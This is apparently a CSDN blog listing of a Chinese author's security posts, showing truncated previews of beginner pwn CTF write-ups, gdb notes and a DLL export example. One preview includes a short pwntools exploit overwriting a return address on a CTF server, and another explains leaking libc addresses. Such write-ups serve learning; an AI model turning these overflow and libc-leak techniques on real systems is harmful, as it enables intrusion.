![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全
Answer777
这个作者很懒,什么都没留下…
展开
-
10.自己动手研究动态链接库和静态链接库的区别
在学习注入dll时候 一直不理解如何区分动态链接库和静态链接库 今天让我们自己写程序将它理解清楚 首先我们打开vs 创建一个动态链接库文件 下面就是创建完文件之后 生成的代码 我们在动态链接库的入口处写入自己的函数 自己动手写一个dll导出函数 #include "pch.h" // _declspec(dllexport) 声明导出函数将该函数从该dll开放提供给其他函数使用 extern "C" _declspec(dllexport) void ccc(); void ccc() { Mes原创 2020-05-25 23:22:36 · 447 阅读 · 0 评论 -
6.pwn入门新手做攻防世界 forgot栈内变量溢出
可以看到这有两个交互 ok 开始写 exp from pwn import* q=remote('111.198.29.45',50004) sysaddr=0x080486cc payload=32*'A'+p32(sysaddr) q.recvuntil("What is your name?") q.sendline('suibian') q.recvuntil("Enter the s...原创 2020-02-18 09:56:30 · 322 阅读 · 0 评论 -
5.pwn入门新手 简单练习gdb调试
#gdb命令 (1)frame n: 查看第n桢的信息, frame可以用f缩写 (2)frame addr: 查看pc地址为addr的桢的相关信息 (3)up n: 查看当前桢上面第n桢的信息 (4)down n: 查看当前桢下面第n桢的信息 https://blog.csdn.net/wang_xya/article/details/46011019 这位大佬的命令更为详细 #include...原创 2020-02-17 17:11:14 · 1736 阅读 · 0 评论 -
3.pwn入门新手做无system泄露libc.so版本攻防世界pwn100 pwn200(dynelf 、libsearcher与got表plt表解)
第一步:基地址 = 实际地址(泄露的got地址) – libc中对应函数的偏移 第二部:目的函数地址 = 基地址 + libc中对应函数的偏移 Dynelf 查找函数地址的典型方法是从泄漏的同一个库中的另一个函数的地址计算到所需函数的偏移量,然而,要使这种方法有效地工作,gLibc的远程服务器版本需要与我们的相同。我们还可以通过泄漏一些函数并在libcdb.com中搜索找到gLibc的远程版本,但...原创 2020-02-12 12:14:48 · 1992 阅读 · 0 评论 -
2. pwn入门新手做system没有参数(内含函数调用过程),需要自己构造的攻防世界cgpwn2,求大佬指教
我们拿到文件之后放到 linux里checksec一下 一个32位文件 ,开了nx 把文件拖入 ida f5开始分析 main 函数 我们看到了hello() 函数 点进去 进行分析 我们看到了比较重要的几行交互代码,,我们看看下面的部分首先要求我们输入一个名字,这个输入是通过fgets函数完成的,从键盘读取最多32h个字符到name区域 我上网百度了一下 fgets的函数原型 我们双击f...原创 2020-02-07 17:50:26 · 1930 阅读 · 0 评论